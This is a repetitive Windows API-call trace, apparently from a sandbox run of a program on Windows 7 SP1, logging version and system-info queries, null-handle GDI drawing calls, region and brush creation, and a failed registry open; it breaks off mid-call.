GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.344] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.344] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.345] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.345] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.345] BeginPath (hdc=0x0) returned 0 [0092.345] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.345] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.345] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.345] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.345] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.345] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.345] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.345] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.345] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa50401dc [0092.345] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa70401d9 [0092.345] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477db [0092.345] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477dc [0092.345] CombineRgn (hrgnDst=0x10477db, hrgnSrc1=0xa50401dc, hrgnSrc2=0xa70401d9, iMode=1) returned 1 [0092.345] CombineRgn (hrgnDst=0x10477dc, hrgnSrc1=0xa50401dc, hrgnSrc2=0xa70401d9, iMode=4) returned 2 [0092.345] CreateSolidBrush (color=0xff) returned 0x21077da [0092.345] CreateSolidBrush (color=0xff0000) returned 0x11077dd [0092.345] DeleteObject (ho=0x11077dd) returned 1 [0092.345] DeleteObject (ho=0xa70401d9) returned 1 [0092.345] DeleteObject (ho=0xa50401dc) returned 1 [0092.345] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.345] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.346] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.346] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.346] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.346] BeginPath (hdc=0x0) returned 0 [0092.346] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.346] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.346] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.346] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.346] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.346] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.346] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.346] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.346] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa80401d9 [0092.346] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa60401dc [0092.346] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477de [0092.346] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477df [0092.346] CombineRgn (hrgnDst=0x10477de, hrgnSrc1=0xa80401d9, hrgnSrc2=0xa60401dc, iMode=1) returned 1 [0092.346] CombineRgn (hrgnDst=0x10477df, hrgnSrc1=0xa80401d9, hrgnSrc2=0xa60401dc, iMode=4) returned 2 [0092.346] CreateSolidBrush (color=0xff) returned 0x21077dd [0092.346] CreateSolidBrush (color=0xff0000) returned 0x11077e0 [0092.346] DeleteObject (ho=0x11077e0) returned 1 [0092.346] DeleteObject (ho=0xa60401dc) returned 1 [0092.346] DeleteObject (ho=0xa80401d9) returned 1 [0092.346] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.346] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.346] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.346] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.346] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.346] BeginPath (hdc=0x0) returned 0 [0092.347] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.347] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.347] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.347] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.347] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.347] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.347] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.347] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.347] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa70401dc [0092.347] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa90401d9 [0092.347] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477e1 [0092.347] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477e2 [0092.347] CombineRgn (hrgnDst=0x10477e1, hrgnSrc1=0xa70401dc, hrgnSrc2=0xa90401d9, iMode=1) returned 1 [0092.347] CombineRgn (hrgnDst=0x10477e2, hrgnSrc1=0xa70401dc, hrgnSrc2=0xa90401d9, iMode=4) returned 2 [0092.347] CreateSolidBrush (color=0xff) returned 0x21077e0 [0092.347] CreateSolidBrush (color=0xff0000) returned 0x11077e3 [0092.347] DeleteObject (ho=0x11077e3) returned 1 [0092.347] DeleteObject (ho=0xa90401d9) returned 1 [0092.347] DeleteObject (ho=0xa70401dc) returned 1 [0092.347] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.347] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.347] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.347] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.347] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.347] BeginPath (hdc=0x0) returned 0 [0092.347] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.347] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.347] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.348] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.348] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.348] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.348] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.348] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.348] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xaa0401d9 [0092.348] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa80401dc [0092.348] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477e4 [0092.348] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477e5 [0092.348] CombineRgn (hrgnDst=0x10477e4, hrgnSrc1=0xaa0401d9, hrgnSrc2=0xa80401dc, iMode=1) returned 1 [0092.348] CombineRgn (hrgnDst=0x10477e5, hrgnSrc1=0xaa0401d9, hrgnSrc2=0xa80401dc, iMode=4) returned 2 [0092.348] CreateSolidBrush (color=0xff) returned 0x21077e3 [0092.348] CreateSolidBrush (color=0xff0000) returned 0x11077e6 [0092.348] DeleteObject (ho=0x11077e6) returned 1 [0092.348] DeleteObject (ho=0xa80401dc) returned 1 [0092.348] DeleteObject (ho=0xaa0401d9) returned 1 [0092.348] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.348] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.349] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.349] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.349] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.349] BeginPath (hdc=0x0) returned 0 [0092.349] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.349] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.349] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.349] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.349] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.349] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.349] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.349] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.349] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa90401dc [0092.349] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xab0401d9 [0092.349] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477e7 [0092.349] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477e8 [0092.349] CombineRgn (hrgnDst=0x10477e7, hrgnSrc1=0xa90401dc, hrgnSrc2=0xab0401d9, iMode=1) returned 1 [0092.349] CombineRgn (hrgnDst=0x10477e8, hrgnSrc1=0xa90401dc, hrgnSrc2=0xab0401d9, iMode=4) returned 2 [0092.349] CreateSolidBrush (color=0xff) returned 0x21077e6 [0092.349] CreateSolidBrush (color=0xff0000) returned 0x11077e9 [0092.349] DeleteObject (ho=0x11077e9) returned 1 [0092.349] DeleteObject (ho=0xab0401d9) returned 1 [0092.349] DeleteObject (ho=0xa90401dc) returned 1 [0092.349] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.349] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.349] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.350] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.350] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.350] BeginPath (hdc=0x0) returned 0 [0092.350] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.350] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.350] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.350] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.350] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.350] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.350] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.350] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.350] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xac0401d9 [0092.350] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xaa0401dc [0092.350] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477ea [0092.350] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477eb [0092.350] CombineRgn (hrgnDst=0x10477ea, hrgnSrc1=0xac0401d9, hrgnSrc2=0xaa0401dc, iMode=1) returned 1 [0092.350] CombineRgn (hrgnDst=0x10477eb, hrgnSrc1=0xac0401d9, hrgnSrc2=0xaa0401dc, iMode=4) returned 2 [0092.350] CreateSolidBrush (color=0xff) returned 0x21077e9 [0092.350] CreateSolidBrush (color=0xff0000) returned 0x11077ec [0092.350] DeleteObject (ho=0x11077ec) returned 1 [0092.350] DeleteObject (ho=0xaa0401dc) returned 1 [0092.350] DeleteObject (ho=0xac0401d9) returned 1 [0092.350] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.350] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.350] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.350] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.350] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.350] BeginPath (hdc=0x0) returned 0 [0092.350] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.350] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.350] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.350] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.350] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.350] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.350] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.350] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.351] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xab0401dc [0092.351] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xad0401d9 [0092.351] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477ed [0092.351] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477ee [0092.351] CombineRgn (hrgnDst=0x10477ed, hrgnSrc1=0xab0401dc, hrgnSrc2=0xad0401d9, iMode=1) returned 1 [0092.351] CombineRgn (hrgnDst=0x10477ee, hrgnSrc1=0xab0401dc, hrgnSrc2=0xad0401d9, iMode=4) returned 2 [0092.351] CreateSolidBrush (color=0xff) returned 0x21077ec [0092.351] CreateSolidBrush (color=0xff0000) returned 0x11077ef [0092.351] DeleteObject (ho=0x11077ef) returned 1 [0092.351] DeleteObject (ho=0xad0401d9) returned 1 [0092.351] DeleteObject (ho=0xab0401dc) returned 1 [0092.351] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.351] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.351] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.351] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.351] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.351] BeginPath (hdc=0x0) returned 0 [0092.351] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.351] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.351] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.351] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.351] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.351] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.351] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.351] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.351] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xae0401d9 [0092.351] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xac0401dc [0092.351] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477f0 [0092.351] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477f1 [0092.351] CombineRgn (hrgnDst=0x10477f0, hrgnSrc1=0xae0401d9, hrgnSrc2=0xac0401dc, iMode=1) returned 1 [0092.351] CombineRgn (hrgnDst=0x10477f1, hrgnSrc1=0xae0401d9, hrgnSrc2=0xac0401dc, iMode=4) returned 2 [0092.351] CreateSolidBrush (color=0xff) returned 0x21077ef [0092.351] CreateSolidBrush (color=0xff0000) returned 0x11077f2 [0092.351] DeleteObject (ho=0x11077f2) returned 1 [0092.351] DeleteObject (ho=0xac0401dc) returned 1 [0092.352] DeleteObject (ho=0xae0401d9) returned 1 [0092.352] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.352] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.352] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.352] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.352] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.352] BeginPath (hdc=0x0) returned 0 [0092.352] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.352] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.352] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.352] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.352] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.352] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.352] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.352] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.352] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xad0401dc [0092.352] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xaf0401d9 [0092.352] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477f3 [0092.352] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477f4 [0092.352] CombineRgn (hrgnDst=0x10477f3, hrgnSrc1=0xad0401dc, hrgnSrc2=0xaf0401d9, iMode=1) returned 1 [0092.352] CombineRgn (hrgnDst=0x10477f4, hrgnSrc1=0xad0401dc, hrgnSrc2=0xaf0401d9, iMode=4) returned 2 [0092.352] CreateSolidBrush (color=0xff) returned 0x21077f2 [0092.352] CreateSolidBrush (color=0xff0000) returned 0x11077f5 [0092.352] DeleteObject (ho=0x11077f5) returned 1 [0092.352] DeleteObject (ho=0xaf0401d9) returned 1 [0092.352] DeleteObject (ho=0xad0401dc) returned 1 [0092.352] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.352] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.352] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.352] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.352] SetDCPenColor (hdc=0x0, 